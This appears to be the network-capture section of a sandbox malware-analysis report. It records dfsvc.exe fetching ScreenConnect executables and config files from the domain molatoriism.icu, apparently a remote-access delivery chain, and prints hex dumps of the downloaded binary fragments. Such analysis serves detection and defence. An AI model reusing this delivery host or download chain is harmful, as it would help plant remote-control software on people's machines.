                                                                                                                                                                                                2024-11-07 16:56:04 UTC1369INData Raw: 08 00 55 8b ec 8b 45 08 85 c0 74 0e 3d dc 4b 41 00 74 07 50 e8 53 14 00 00 59 5d c2 04 00 e8 09 00 00 00 85 c0 0f 84 e1 29 00 00 c3 83 3d 20 40 41 00 ff 75 03 33 c0 c3 53 57 ff 15 48 d0 40 00 ff 35 20 40 41 00 8b f8 e8 b5 11 00 00 8b d8 59 83 fb ff 74 17 85 db 75 59 6a ff ff 35 20 40 41 00 e8 d7 11 00 00 59 59 85 c0 75 04 33 db eb 42 56 6a 28 6a 01 e8 2f 2a 00 00 8b f0 59 59 85 f6 74 12 56 ff 35 20 40 41 00 e8 af 11 00 00 59 59 85 c0 75 12 33 db 53 ff 35 20 40 41 00 e8 9b 11 00 00 59 59 eb 04 8b de 33 f6 56 e8 bc 13 00 00 59 5e 57 ff 15 d8 d0 40 00 5f 8b c3 5b c3 68 08 39 40 00 e8 c4 10 00 00 a3 20 40 41 00 59 83 f8 ff 75 03 32 c0 c3 68 dc 4b 41 00 50 e8 5c 11 00 00 59 59 85 c0 75 07 e8 05 00 00 00 eb e5 b0 01 c3 a1 20 40 41 00 83 f8 ff 74 0e 50 e8 c6 10
                                                                                                                                                                                                Data Ascii: UEt=KAtPSY])= @Au3SWH@5 @AYtuYj5 @AYYu3BVj(j/*YYtV5 @AYYu3S5 @AYY3VY^W@_[h9@ @AYu2hKAP\YYu @AtP


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                3192.168.2.949806104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:05 UTC107OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                2024-11-07 16:56:06 UTC794INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:06 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                CF-Cache-Status: BYPASS
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c8nlPZnylwm6Qg%2BCSocN71uv57bKuXFYX1TX%2BRbbhhqJaMP3rHE4e9KWi7ibNwnRC5ND9Wb2VvghHm1ElJQcT5ahFWBCEIi6b4uzOLLve97EN9kqiWRK9UX2QG%2ByUEl%2BggU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedacc9a81e8f5-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1403&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=722&delivery_rate=2033707&cwnd=251&unsent_bytes=0&cid=1e3699e7371dab74&ts=839&x=0"
                                                                                                                                                                                                2024-11-07 16:56:06 UTC575INData Raw: 37 38 61 61 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4c e0 0e b8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 33 5d 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                                                Data Ascii: 78aaMZ@!L!This program cannot be run in DOS mode.$PELL"0 @ 3]@
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 11 00 00 0a 2a 5e 02 28 11 00 00 0a 02 17 8d 61 00 00 01 25 16 03 9c 7d 01 00 00 04 2a 3a 02 28 11 00 00 0a 02 03 7d 01 00 00 04 2a 3a 02 28 11 00 00 0a 02 03 7d 02 00 00 04 2a 3a 02 28 11 00 00 0a 02 03 7d 03 00 00 04 2a 00 00 00 13 30 04 00 8e 00 00 00 00 00 00 00 28 12 00 00 0a 28 13 00 00 0a 28 14 00 00 0a 28 15 00 00 0a 72 01 00 00 70 28 16 00 00 0a 6f 17 00 00 0a 28 18 00 00 0a 72 1d 00 00 70 1f 0b 7e 19 00 00 0a 28 1a 00 00 0a 28 18 00 00 0a 72 39 00 00 70 1f 16 7e 19 00 00 0a 28 1a 00 00 0a 28 18 00 00 0a 1f 67 7e 29 00 00 04 14 19 28 1b 00 00 0a 72 59 00 00 70 18 28 1c 00 00 0a 26 28 1d 00 00 0a 16 28 1e 00 00 0a 73 1f 00 00 0a 28 20 00 00 0a 73 07 00 00 06 28 21 00 00
                                                                                                                                                                                                Data Ascii: (*^(a%}*:(}*:(}*:(}*0((((rp(o(rp~((r9p~((g~)(rYp(&((s( s(!
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 00 00 0a 28 04 00 00 2b 6f 6c 00 00 0a 26 11 0a 17 58 13 0a 11 0a 11 09 8e 69 3f 19 ff ff ff 28 6d 00 00 0a 6f 6e 00 00 0a 13 0e 2b 11 11 0e 6f 6f 00 00 0a 13 0f 02 11 0f 28 0c 00 00 06 11 0e 6f 70 00 00 0a 2d e6 de 0c 11 0e 2c 07 11 0e 6f 5b 00 00 0a dc de 10 26 02 16 28 24 00 00 0a 02 28 71 00 00 0a de 00 2a 00 00 41 4c 00 00 02 00 00 00 a6 01 00 00 43 00 00 00 e9 01 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 a1 03 00 00 1e 00 00 00 bf 03 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cd 03 00 00 cd 03 00 00 10 00 00 00 21 00 00 01 1b 30 05 00 28 03 00 00 02 00 00 11 03 28 72 00 00 0a 7e 0a 00 00 04 40 7c 01 00 00 72 70 02 00 70 19 8d 14 00 00 01 25 16 72 8a 02 00 70 a2 25 17 03 28 73 00 00 0a 28 74 00 00 0a 8c 23 00 00 01 a2 25 18 03 28 75 00 00
                                                                                                                                                                                                Data Ascii: (+ol&Xi?(mon+oo(op-,o[&($(q*ALC!0((r~@|rpp%rp%(s(t#%(u
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 93 00 00 0a 28 10 00 00 2b 7d 3b 00 00 04 73 48 00 00 06 25 03 7e 17 00 00 04 28 6e 00 00 06 25 2d 22 26 09 7b 3b 00 00 04 25 2d 04 26 14 2b 05 6f 95 00 00 0a 25 2d 0c 26 18 7e 17 00 00 04 28 70 00 00 06 6f 62 00 00 0a 25 17 6f 2e 00 00 06 25 17 6f 25 00 00 06 25 03 6f 3f 00 00 06 25 06 6f 45 00 00 06 25 08 7b 38 00 00 04 6f 43 00 00 06 25 09 7b 3b 00 00 04 6f 41 00 00 06 13 04 09 7b 3b 00 00 04 2d 14 02 28 0e 00 00 06 6f 5f 00 00 0a 11 04 6f 6c 00 00 0a 26 2a 09 7b 3b 00 00 04 16 6f 96 00 00 0a 02 28 0e 00 00 06 6f 5f 00 00 0a 02 28 0e 00 00 06 6f 5f 00 00 0a 28 11 00 00 2b 09 fe 06 83 00 00 06 73 97 00 00 0a 15 28 12 00 00 2b 17 58 11 04 6f 99 00 00 0a 2a 00 00 00 13 30 04 00 94 00 00 00 04 00 00 11 73 84 00 00 06 0a 06 03 7d 3c 00 00 04 06 02 28 0e 00
                                                                                                                                                                                                Data Ascii: (+};sH%~(n%-"&{;%-&+o%-&~(pob%o.%o%%o?%oE%{8oC%{;oA{;-(o_ol&*{;o(o_(o_(+s(+Xo*0s}<(
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 0a 2d 07 7e 1e 00 00 04 2b 05 7e 1d 00 00 04 6f cb 00 00 0a 03 6f c5 00 00 0a 03 6f cc 00 00 0a 03 6f cd 00 00 0a 03 6f ce 00 00 0a 03 6f cf 00 00 0a 03 6f d0 00 00 0a 28 d1 00 00 0a 2a 4e 03 7e 22 00 00 04 6f d2 00 00 0a 02 03 28 d3 00 00 0a 2a 00 00 13 30 07 00 2a 01 00 00 0a 00 00 11 03 6f c4 00 00 0a 75 0e 00 00 02 0a 06 2c 31 06 6f 2b 00 00 06 2c 29 03 6f c5 00 00 0a 7e 1b 00 00 04 12 01 fe 15 30 00 00 01 07 03 6f c4 00 00 0a 6f c6 00 00 0a 73 be 00 00 0a 6f c7 00 00 0a 03 6f c4 00 00 0a 6f b8 00 00 0a 2c 29 03 6f c5 00 00 0a 7e 1c 00 00 04 12 01 fe 15 30 00 00 01 07 03 6f c4 00 00 0a 6f c6 00 00 0a 73 be 00 00 0a 6f c7 00 00 0a 03 6f c4 00 00 0a 75 0e 00 00 02 0a 06 39 a1 00 00 00 06 6f 2d 00 00 06 39 96 00 00 00 03 6f c5 00 00 0a 7e 2f 00 00 04 03
                                                                                                                                                                                                Data Ascii: -~+~ooooooo(*N~"o(*0*ou,1o+,)o~0oosooo,)o~0oosoou9o-9o~/
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 18 7e 60 00 00 0a 72 76 03 00 70 17 6f fe 00 00 0a 14 02 fe 06 4c 00 00 06 73 ef 00 00 0a 73 76 00 00 06 a2 25 19 7e 60 00 00 0a 72 f6 03 00 70 17 6f fe 00 00 0a 14 02 fe 06 4e 00 00 06 73 ef 00 00 0a 73 76 00 00 06 a2 25 1a 7e 60 00 00 0a 72 6a 04 00 70 17 6f fe 00 00 0a 14 02 fe 06 4f 00 00 06 73 ef 00 00 0a 73 76 00 00 06 a2 6f 63 00 00 0a 02 28 e5 00 00 0a 28 1b 00 00 2b 28 1c 00 00 2b 0a 06 6f ff 00 00 0a 28 1d 00 00 2b 14 18 28 1e 00 00 2b 0b 02 28 3e 00 00 06 28 02 01 00 0a 3a 01 01 00 00 02 28 3e 00 00 06 28 03 01 00 0a 0c 07 6f 04 01 00 0a 25 2d 0d 26 12 05 fe 15 17 00 00 1b 11 05 2b 0a 28 05 01 00 0a 73 06 01 00 0a 0d 12 02 28 07 01 00 0a 28 08 01 00 0a 13 04 12 03 28 09 01 00 0a 2d 03 17 2b 0e 12 03 28 0a 01 00 0a 11 04 28 0b 01 00 0a 2c 2a 07
                                                                                                                                                                                                Data Ascii: ~`rvpoLssv%~`rpoNssv%~`rjpoOssvoc((+(+o(+(+(>(:(>(o%-&+(s(((-+((,*
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 00 00 04 25 2d 17 26 7e 49 00 00 04 fe 06 9f 00 00 06 73 31 01 00 0a 25 80 4a 00 00 04 28 1f 00 00 2b 28 20 00 00 2b 28 21 00 00 2b 0a 02 28 e5 00 00 0a 28 61 00 00 06 02 28 e5 00 00 0a 06 6f 63 00 00 0a 2a 1e 02 28 23 00 00 06 2a 1a 7e 2c 00 00 04 2a 00 00 13 30 0f 00 25 02 00 00 14 00 00 11 73 a4 00 00 06 0a 06 14 7d 4f 00 00 04 06 14 7d 50 00 00 04 06 14 7d 52 00 00 04 06 14 7d 51 00 00 04 06 14 7d 53 00 00 04 03 19 8d 40 00 00 01 25 16 06 73 e7 00 00 0a 25 17 6f 35 01 00 0a 25 1b 6f 26 00 00 0a 17 8d 40 00 00 01 25 16 06 73 a6 00 00 0a 25 1a 6f 25 00 00 0a 25 7e 20 00 00 04 6f 29 00 00 0a 25 7e 1d 00 00 04 6f ea 00 00 0a 25 73 1b 00 00 06 6f 28 00 00 0a 25 0b 7d 50 00 00 04 07 a2 28 22 00 00 2b 25 0c 7d 52 00 00 04 08 a2 25 17 06 73 e7 00 00 0a 25 1b
                                                                                                                                                                                                Data Ascii: %-&~Is1%J(+( +(!+((a(oc*(#*~,*0%s}O}P}R}Q}S@%s%o5%o&@%s%o%%~ o)%~o%so(%}P("+%}R%s%
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 11 02 28 11 00 00 2b 28 23 00 00 2b 6f 4d 01 00 0a 0a 2b 0c 12 00 28 4e 01 00 0a 28 62 00 00 06 12 00 28 4f 01 00 0a 2d eb de 0e 12 00 fe 16 1a 00 00 1b 6f 5b 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 11 00 19 2a 00 0e 00 00 00 00 13 30 02 00 2d 00 00 00 16 00 00 11 02 75 4b 00 00 01 0a 06 2c 0b 06 6f e5 00 00 0a 28 61 00 00 06 02 6f 95 00 00 0a 25 2d 03 26 2b 05 28 0c 01 00 0a 02 6f 50 01 00 0a 2a 72 1f 16 7e 19 00 00 0a 28 1a 00 00 0a 73 51 01 00 0a 72 98 0d 00 70 28 52 01 00 0a 2a 00 00 13 30 04 00 dd 00 00 00 00 00 00 00 28 53 01 00 0a 28 24 00 00 2b 7e 56 00 00 04 25 2d 17 26 7e 55 00 00 04 fe 06 ac 00 00 06 73 55 01 00 0a 25 80 56 00 00 04 28 25 00 00 2b 28 57 01 00 0a 28 26 00 00 2b 28 59 01 00 0a 7e 57 00 00 04 25 2d 17 26 7e 55 00 00 04 fe 06 ad
                                                                                                                                                                                                Data Ascii: (+(#+oM+(N(b(O-o[**0-uK,o(ao%-&+(oP*r~(sQrp(R*0(S($+~V%-&~UsU%V(%+(W(&+(Y~W%-&~U
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 64 00 00 04 28 81 01 00 0a 26 06 7b 64 00 00 04 16 d3 28 7b 00 00 0a 2c 21 02 1f 37 16 28 a8 00 00 0a 16 28 a8 00 00 0a 18 20 e8 03 00 00 06 7c 64 00 00 04 28 81 01 00 0a 26 06 7b 64 00 00 04 16 d3 28 7b 00 00 0a 2c 0e 06 02 1f f2 28 8c 01 00 0a 7d 64 00 00 04 06 7b 64 00 00 04 16 d3 28 7b 00 00 0a 2c 02 14 2a 06 fe 06 bc 00 00 06 73 8d 01 00 0a 17 28 35 00 00 2b 2a 00 1b 30 02 00 5d 00 00 00 1e 00 00 11 02 6f 8e 01 00 0a 03 28 8f 01 00 0a 2c 07 02 6f 90 01 00 0a 2a 02 03 73 91 01 00 0a 0a 06 6f 8e 01 00 0a 03 28 8f 01 00 0a 2c 09 06 6f 90 01 00 0a 0b de 27 de 0a 06 2c 06 06 6f 5b 00 00 0a dc 02 6f 90 01 00 0a 0c 08 03 73 92 01 00 0a 0b de 0a 08 2c 06 08 6f 5b 00 00 0a dc 07 2a 00 00 00 01 1c 00 00 02 00 1d 00 19 36 00 0a 00 00 00 00 02 00 47 00 0a 51 00
                                                                                                                                                                                                Data Ascii: d(&{d({,!7(( |d(&{d({,(}d{d({,*s(5+*0]o(,o*so(,o',o[os,o[*6GQ
                                                                                                                                                                                                2024-11-07 16:56:06 UTC1369INData Raw: 2b 6f bc 01 00 0a 0a 2b 66 06 6f bd 01 00 0a 02 28 be 01 00 0a 0b 12 01 28 d7 00 00 0a 02 28 be 01 00 0a 0b 12 01 28 d9 00 00 0a 02 28 bd 00 00 0a 0c 12 02 28 86 01 00 0a 02 28 be 01 00 0a 0b 12 01 28 db 00 00 0a 59 02 28 bd 00 00 0a 0c 12 02 28 bf 01 00 0a 02 28 be 01 00 0a 0b 12 01 28 dd 00 00 0a 59 73 c0 01 00 0a 6f 98 00 00 06 06 6f 70 00 00 0a 2d 92 de 0a 06 2c 06 06 6f 5b 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 18 00 72 8a 00 0a 00 00 00 00 1e 02 28 c1 01 00 0a 2a 22 02 03 28 f9 00 00 0a 2a 22 02 03 6f c2 01 00 0a 2a 00 00 13 30 04 00 60 00 00 00 25 00 00 11 02 6f c3 01 00 0a 0a 12 00 28 86 01 00 0a 02 6f c3 01 00 0a 0a 12 00 28 bf 01 00 0a 02 28 04 01 00 0a 2c 2c 02 6f c3 01 00 0a 0a 12 00 28 86 01 00 0a 6b 02 28 04 01 00 0a 6f c4 01 00 0a 6b 5a
                                                                                                                                                                                                Data Ascii: +o+fo((((((((Y((((Ysoop-,o[*r(*"(*"o*0`%o(o((,,o(k(okZ


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                4192.168.2.949813104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:07 UTC111OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                2024-11-07 16:56:08 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:08 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OGMeMXoaWfVRfwhoqZtz2UxHDJa9DKRVY6uW3MLq3nbJqxpx%2FU9nWqnfzPp2KEOj%2BBuIoP39zgiLNzJxCjNKJEA3Y9%2FvWzH13F3JZIY8F972FB00GrXDIB9ueyLQavlAksA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedad6ef36e85b-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1339&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=726&delivery_rate=2360228&cwnd=95&unsent_bytes=0&cid=07c09f9c68186f44&ts=826&x=0"
                                                                                                                                                                                                2024-11-07 16:56:08 UTC273INData Raw: 31 30 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a
                                                                                                                                                                                                Data Ascii: 10a<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime>
                                                                                                                                                                                                2024-11-07 16:56:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                5192.168.2.949824104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:08 UTC106OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                2024-11-07 16:56:09 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:09 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x7X5GuM%2FfFWgS5mE%2BmKlOZQHMkVCHTDzsYRPwnUPBr40rDWo1V6p%2BcPz73W192R1KQuSD5bFqgVJKz7dZS%2BIUtHJzAAKTEmkcaZ9DkbAwbYdedzADq7FxUJHVDpy3%2BzBwcE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedadffee445f3-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1915&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=721&delivery_rate=1543710&cwnd=251&unsent_bytes=0&cid=210cea38dcc710c2&ts=766&x=0"
                                                                                                                                                                                                2024-11-07 16:56:09 UTC273INData Raw: 31 30 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a
                                                                                                                                                                                                Data Ascii: 10a<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime>
                                                                                                                                                                                                2024-11-07 16:56:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                6192.168.2.949831104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:10 UTC114OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                2024-11-07 16:56:11 UTC771INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:10 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajCZC09AkPwApUodssNngwhtTWLaGp7EshzkvOaLIyGtJ%2FEvAHd2syuXlCdUzn5Pk46WAJ%2BdGqo5gDzqBCa94mDIml5rRtjn3jV2T8zJmQl8KGAnm4Qhv1kfDMvdEAHa%2FM8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedae8cd64a912-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1998&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=729&delivery_rate=1359624&cwnd=159&unsent_bytes=0&cid=95883dae86aeb20a&ts=776&x=0"
                                                                                                                                                                                                2024-11-07 16:56:11 UTC273INData Raw: 31 30 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a
                                                                                                                                                                                                Data Ascii: 10a<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime>
                                                                                                                                                                                                2024-11-07 16:56:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                7192.168.2.949840104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:12 UTC104OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                2024-11-07 16:56:12 UTC794INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:12 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                CF-Cache-Status: BYPASS
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8V74StIO7eWxeERg9TnxEx52VEIlX0tNwwjcVV03JMUyFpVE10tqrbHbQAzo9RHqlZMnnyUESygLFTXGbmw6WjoSZs4IWjsY%2B1X4fJdk0p4%2BSl8%2B8gYh%2FOAwxFpQUpZACYE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedaf3ca99e813-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1480&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=719&delivery_rate=2016713&cwnd=251&unsent_bytes=0&cid=91160f7084002912&ts=747&x=0"
